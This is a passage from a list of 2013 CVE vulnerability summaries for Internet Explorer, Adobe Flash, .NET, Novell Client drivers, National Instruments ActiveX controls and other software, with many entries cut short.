subsystem in National Instruments LabWindows/CVI before 2013 has unknown impact and remote attack vectors. [CVE-2013-5023] Unspecified vulnerability in an ActiveX control in the HelpAsst component in NI Help Links in National Instruments LabWindows/CVI, LabVIEW, and other products has unknown impact and remote attack vectors. [CVE-2013-5022] Absolute path traversal vulnerability in the 3D Graph ActiveX control in cw3dgrph.ocx in National Instruments LabWindows/CVI, LabVIEW, and other products allows remote attackers to create and execute arbitrary files via a full pathname in an argument to the ExportStyle method. [CVE-2013-5021] Multiple absolute path traversal vulnerabilities in National Instruments cwui.ocx, as used in National Instruments LabWindows/CVI, National Instruments LabVIEW, the Data Analysis component in ABB DataManager 1 through 6.3.6, and other products allow remote attackers to create and execute arbitrary files via a full pathname in an argument to the ExportStyle method in the (1) CWNumEdit, (2) CWGraph, (3) CWBoolean, (4) CWSlide, or (5) CWKnob ActiveX control, in conjunction with file content in the (a) Caption or (b) FormatString property value. [CVE-2013-4669] FortiClient before 4.3.5.472 on Windows, before 4.0.3.134 on Mac OS X, and before 4.0 on Android [CVE-2013-4015] Microsoft Internet Explorer 6 through 10 allows local users to bypass the elevation policy check in the (1) Protected Mode or (2) Enhanced Protected Mode protection mechanism, and consequently gain privileges, by leveraging the ability to execute sandboxed code. [CVE-2013-3956] The NICM.SYS kernel driver 3.1.11.0 in Novell Client 4.91 SP5 on Windows XP and Windows Server 2003 [CVE-2013-3697] Integer overflow in the NWFS.SYS kernel driver 4.91.5.8 in Novell Client 4.91 SP5 on Windows XP and Windows Server 2003 and the NCPL.SYS kernel driver in Novell Client 2 SP2 on Windows Vista and Windows Server 2008 and Novell Client 2 SP3 on Windows Server 2008 R2, Windows 7, Windows 8, and Windows Server 2012 might allow local users to gain privileges via a crafted 0x1439EB IOCTL call. [CVE-2013-3393] The Precision Video Engine component in Cisco Jabber for Windows and Cisco Virtualization Experience Media Engine allows remote attackers to cause a denial of service (process crash and call disconnection) via crafted RTP packets, aka Bug IDs CSCuh60706 and CSCue21117. [CVE-2013-3347] Integer overflow in Adobe Flash Player before 11.7.700.232 and 11.8.x before 11.8.800.94 on Windows and Mac OS X, before 11.2.202.297 on Linux, before 11.1.111.64 on Android 2.x and 3.x, and before 11.1.115.69 on Android 4.x allows attackers to execute arbitrary code via PCM data that is not properly handled during resampling. [CVE-2013-3345] Adobe Flash Player before 11.7.700.232 and 11.8.x before 11.8.800.94 on Windows and Mac OS X, before 11.2.202.297 on Linux, before 11.1.111.64 on Android 2.x and 3.x, and before 11.1.115.69 on Android 4.x allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. [CVE-2013-3344] Heap-based buffer overflow in Adobe Flash Player before 11.7.700.232 and 11.8.x before 11.8.800.94 on Windows and Mac OS X, before 11.2.202.297 on Linux, before 11.1.111.64 on Android 2.x and 3.x, and before 11.1.115.69 on Android 4.x allows attackers to execute arbitrary code via unspecified vectors. [CVE-2013-3343] Adobe Flash Player before 10.3.183.90 and 11.x before 11.7.700.224 on Windows, before 10.3.183.90 and 11.x before 11.7.700.225 on Mac OS X, before 10.3.183.90 and 11.x before 11.2.202.291 on Linux, before 11.1.111.59 on Android 2.x and 3.x, and before 11.1.115.63 on Android 4.x [CVE-2013-3335] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3334] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3333] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3332] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3331] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3330] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3329] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3328] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3327] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3326] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3325] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3324] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-3178] Microsoft Silverlight 5 before 5.1.20513.0 does not properly initialize arrays, which allows remote attackers to execute arbitrary code or cause a denial of service (NULL pointer dereference) via a crafted Silverlight application, aka "Null Pointer Vulnerability." [CVE-2013-3171] The serialization functionality in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly check the permissions of delegate objects, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages a partial-trust relationship, aka "Delegate Serialization Vulnerability." [CVE-2013-3166] Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to inject arbitrary web script or HTML via vectors involving incorrect auto-selection of the Shift JIS encoding, leading to cross-domain scrolling events, aka "Shift JIS Character Encoding Vulnerability," a different vulnerability than CVE-2013-0015. [CVE-2013-3164] Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability." [CVE-2013-3163] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3144 and CVE-2013-3151. [CVE-2013-3162] Microsoft Internet Explorer 7 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3115. [CVE-2013-3161] Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3143. [CVE-2013-3153] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3148. [CVE-2013-3152] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3146. [CVE-2013-3151] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3144 and CVE-2013-3163. [CVE-2013-3150] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3145. [CVE-2013-3149] Microsoft Internet Explorer 7 and 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability." [CVE-2013-3148] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3153. [CVE-2013-3147] Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability." [CVE-2013-3146] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3152. [CVE-2013-3145] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3150. [CVE-2013-3144] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3151 and CVE-2013-3163. [CVE-2013-3143] Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3161. [CVE-2013-3142] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3112, CVE-2013-3113, CVE-2013-3121, and CVE-2013-3139. [CVE-2013-3141] Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3110. [CVE-2013-3139] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3112, CVE-2013-3113, CVE-2013-3121, and CVE-2013-3142. [CVE-2013-3134] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 on 64-bit platforms does not properly allocate arrays of structures, which allows remote attackers to execute arbitrary code via a crafted .NET Framework application that changes array data, aka "Array Allocation Vulnerability." [CVE-2013-3133] Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly check the permissions of objects that use reflection, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka "Anonymous Method Injection Vulnerability." [CVE-2013-3132] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly check the permissions of objects that use reflection, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka "Delegate Reflection Bypass Vulnerability." [CVE-2013-3131] Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5, and Silverlight 5 before 5.1.20513.0, does not properly prevent changes to data in multidimensional arrays of structures, which allows remote attackers to execute arbitrary code via (1) a crafted .NET Framework application or (2) a crafted Silverlight application, aka "Array Access Violation Vulnerability." [CVE-2013-3129] Microsoft .NET Framework 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 [CVE-2013-3126] Microsoft Internet Explorer 9 and 10, when script debugging is enabled, does not properly handle objects in memory during the processing of script, which allows remote attackers to execute arbitrary code via a crafted web site, aka "Internet Explorer Script Debug Vulnerability." [CVE-2013-3125] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3118 and CVE-2013-3120. [CVE-2013-3124] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3117 and CVE-2013-3122. [CVE-2013-3123] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3111. [CVE-2013-3122] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3117 and CVE-2013-3124. [CVE-2013-3121] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3112, CVE-2013-3113, CVE-2013-3139, and CVE-2013-3142. [CVE-2013-3120] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3118 and CVE-2013-3125. [CVE-2013-3119] Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3114. [CVE-2013-3118] Microsoft Internet Explorer 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3120 and CVE-2013-3125. [CVE-2013-3117] Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3122 and CVE-2013-3124. [CVE-2013-3116] Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability." [CVE-2013-3115] Microsoft Internet Explorer 7 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3162. [CVE-2013-3114] Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3119. [CVE-2013-3113] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3112, CVE-2013-3121, CVE-2013-3139, and CVE-2013-3142. [CVE-2013-3112] Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3113, CVE-2013-3121, CVE-2013-3139, and CVE-2013-3142. [CVE-2013-3111] Microsoft Internet Explorer 8 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3123. [CVE-2013-3110] Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3141. [CVE-2013-3028] Multiple buffer overflows in mqm programs in IBM WebSphere MQ 7.0.x before 7.0.1.11, 7.1.x before 7.1.0.3, and 7.5.x before 7.5.0.2 on non-Windows platforms allow local users to gain privileges via unspecified vectors. [CVE-2013-2977] Integer overflow in IBM Notes 8.5.x before 8.5.3 FP4 Interim Fix 1 and 9.x before 9.0 Interim Fix 1 on Windows, and 8.5.x before 8.5.3 FP5 and 9.x before 9.0.1 on Linux, allows remote attackers to execute arbitrary code via a malformed PNG image in a previewed e-mail message, aka SPR NPEI96K82Q. [CVE-2013-2874] Google Chrome before 28.0.1500.71 on Windows, when an Nvidia GPU is used, allows remote attackers to bypass intended restrictions on access to screen data via vectors involving IPC transmission of GL textures. [CVE-2013-2867] Google Chrome before 28.0.1500.71 does not properly prevent pop-under windows, which allows remote attackers to have an unspecified impact via a crafted web site. [CVE-2013-2854] Google Chrome before 27.0.1453.110 on Windows provides an incorrect handle to a renderer process in unspecified circumstances, which allows remote attackers to cause a denial of service or possibly have other impact via unknown vectors. [CVE-2013-2728] Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x [CVE-2013-2557] The sandbox protection mechanism in Microsoft Internet Explorer 9 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors, as demonstrated against Adobe Flash Player by VUPEN during a Pwn2Own competition at CanSecWest 2013. [CVE-2013-2555] Integer overflow in Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on Windows and Mac OS X, before 10.3.183.75 and 11.x before 11.2.202.280 on Linux, before 11.1.111.50 on Android 2.x and 3.x, and before 11.1.115.54 on Android 4.x [CVE-2013-2551] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2013, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1308 and CVE-2013-1309. [CVE-2013-2496] The msrle_decode_8_16_24_32 function in msrledec.c in libavcodec in FFmpeg through 1.1.3 does not properly determine certain end pointers, which allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted Microsoft RLE data. [CVE-2013-2492] Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information. [CVE-2013-2451] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier and 6 Update 45 and earlier, and OpenJDK 7, allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Networking. NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to improper enforcement of exclusive port binds when running on Windows, which allows attackers to bind to ports that are already in use. [CVE-2013-2310] SoftBank Wi-Fi Spot Configuration Software, as used on SoftBank SHARP 3G handsets, SoftBank Panasonic 3G handsets, SoftBank NEC 3G handsets, SoftBank Samsung 3G handsets, SoftBank mobile Wi-Fi routers, SoftBank Android smartphones with the Wi-Fi application before 1.7.1, SoftBank Windows Mobile smartphones with the WISPrClient application before 1.3.1, SoftBank Disney Mobile Android smartphones with the Wi-Fi application before 1.7.1, and WILLCOM Android smartphones with the Wi-Fi application before 1.7.1, does not properly connect to access points, which allows remote attackers to obtain sensitive information by leveraging access to an 802.11 network. [CVE-2013-2306] The jigbrowser+ application before 1.6.4 for Android does not properly open windows, which allows remote attackers to spoof the address bar via a crafted web site. [CVE-2013-2303] Sleipnir 4.0.0.4000 and earlier on Windows allows remote attackers to spoof the SSL lock icon and address-bar colors via unspecified vectors. [CVE-2013-2268] Unspecified vulnerability in the MathML implementation in WebKit in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, has unknown impact and remote attack vectors, related to a "high severity security issue." [CVE-2013-1715] Multiple untrusted search path vulnerabilities in the (1) full installer and (2) stub installer in Mozilla Firefox before 23.0 on Windows allow local users to gain privileges via a Trojan horse DLL in the default downloads directory. NOTE: this issue exists because of an incomplete fix for CVE-2012-4206. [CVE-2013-1712] Multiple untrusted search path vulnerabilities in updater.exe in Mozilla Updater in Mozilla Firefox before 23.0, Firefox ESR 17.x before 17.0.8, Thunderbird before 17.0.8, and Thunderbird ESR 17.x before 17.0.8 on Windows 7, Windows Server 2008 R2, Windows 8, and Windows Server 2012 allow local users to gain privileges via a Trojan horse DLL in (1) the update directory or (2) the current working directory. [CVE-2013-1700] The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location. [CVE-2013-1673] The Mozilla Updater in Mozilla Firefox before 21.0 on Windows does not properly maintain Mozilla Maintenance Service registry entries in certain situations involving upgrades from older Firefox versions, which allows local users to gain privileges by leveraging write access to a "trusted path." [CVE-2013-1672] The Mozilla Maintenance Service in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 on Windows allows local users to bypass integrity verification and gain privileges via vectors involving junctions. [CVE-2013-1610] Unquoted Windows search path vulnerability in RDDService in Symantec PGP Desktop 10.0.x through 10.2.x and Symantec Encryption Desktop 10.3.0 before MP3 allows local users to gain privileges via a Trojan horse application in the %SYSTEMDRIVE% top-level directory. [CVE-2013-1609] Multiple unquoted Windows search path vulnerabilities in the (1) File Collector and (2) File PlaceHolder services in Symantec Enterprise Vault (EV) for File System Archiving before 9.0.4 and 10.x before 10.0.1 allow local users to gain privileges via a Trojan horse program. [CVE-2013-1489] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 10 and Update 11, when running on Windows using Internet Explorer, Firefox, Opera, and Google Chrome, allows remote attackers to bypass the "Very High" security level of the Java Control Panel and execute unsigned Java code without prompting the user via unknown vectors, aka "Issue 53" and the "Java Security Slider" vulnerability. [CVE-2013-1451] Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not ensure that the SSL lock icon is consistent with the Address bar, which makes it easier for remote attackers to spoof web sites via a crafted HTML document that triggers many HTTPS requests to an arbitrary host, followed by an HTTPS request to a trusted host and then an HTTP request to an untrusted host, a related issue to CVE-2013-1450. [CVE-2013-1450] Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd. [CVE-2013-1406] The Virtual Machine Communication Interface (VMCI) implementation in vmci.sys in VMware Workstation 8.x before 8.0.5 and 9.x before 9.0.1 on Windows, VMware Fusion 4.1 before 4.1.4 and 5.0 before 5.0.2, VMware View 4.x before 4.6.2 and 5.x before 5.1.2 on Windows, VMware ESXi 4.0 through 5.1, and VMware ESX 4.0 and 4.1 does not properly restrict memory allocation by control code, which allows local users to gain privileges via unspecified vectors. [CVE-2013-1380] Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on Windows and Mac OS X, before 10.3.183.75 and 11.x before 11.2.202.280 on Linux, before 11.1.111.50 on Android 2.x and 3.x, and before 11.1.115.54 on Android 4.x [CVE-2013-1379] Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on Windows and Mac OS X, before 10.3.183.75 and 11.x before 11.2.202.280 on Linux, before 11.1.111.50 on Android 2.x and 3.x, and before 11.1.115.54 on Android 4.x [CVE-2013-1378] Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on Windows and Mac OS X, before 10.3.183.75 and 11.x before 11.2.202.280 on Linux, before 11.1.111.50 on Android 2.x and 3.x, and before 11.1.115.54 on Android 4.x [CVE-2013-1375] Heap-based buffer overflow in Adobe Flash Player before 10.3.183.68 and 11.x before 11.6.602.180 on Windows and Mac OS X, before 10.3.183.68 and 11.x before 11.2.202.275 on Linux, before 11.1.111.44 on Android 2.x and 3.x, and before 11.1.115.48 on Android 4.x [CVE-2013-1374] Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1373] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1372] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1371] Adobe Flash Player before 10.3.183.68 and 11.x before 11.6.602.180 on Windows and Mac OS X, before 10.3.183.68 and 11.x before 11.2.202.275 on Linux, before 11.1.111.44 on Android 2.x and 3.x, and before 11.1.115.48 on Android 4.x [CVE-2013-1370] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1369] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1368] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1367] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1366] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1365] Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x [CVE-2013-1347] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly allocated or (2) is deleted, as exploited in the wild in May 2013. [CVE-2013-1346] mpengine.dll in Microsoft Malware Protection Engine before 1.1.9506.0 on x64 platforms allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted file. [CVE-2013-1338] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1303 and CVE-2013-1304. [CVE-2013-1336] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly check signatures, which allows remote attackers to make undetected changes to signed XML documents via unspecified vectors that preserve signature validity, aka "XML Digital Signature Spoofing Vulnerability." [CVE-2013-1335] Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code via crafted shape data in a Word document, aka "Word Shape Corruption Vulnerability." [CVE-2013-1331] Buffer overflow in Microsoft Office 2003 SP3 and Office 2011 for Mac allows remote attackers to execute arbitrary code via crafted PNG data in an Office document, leading to improper memory allocation, aka "Office Buffer Overflow Vulnerability." [CVE-2013-1329] Integer signedness error in Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers a buffer underflow, aka "Publisher Buffer Underflow Vulnerability." [CVE-2013-1328] Microsoft Publisher 2003 SP3, 2007 SP3, and 2010 SP1 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers incorrect pointer handling, aka "Publisher Pointer Handling Vulnerability." [CVE-2013-1327] Integer signedness error in Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers an improper memory allocation, aka "Publisher Signed Integer 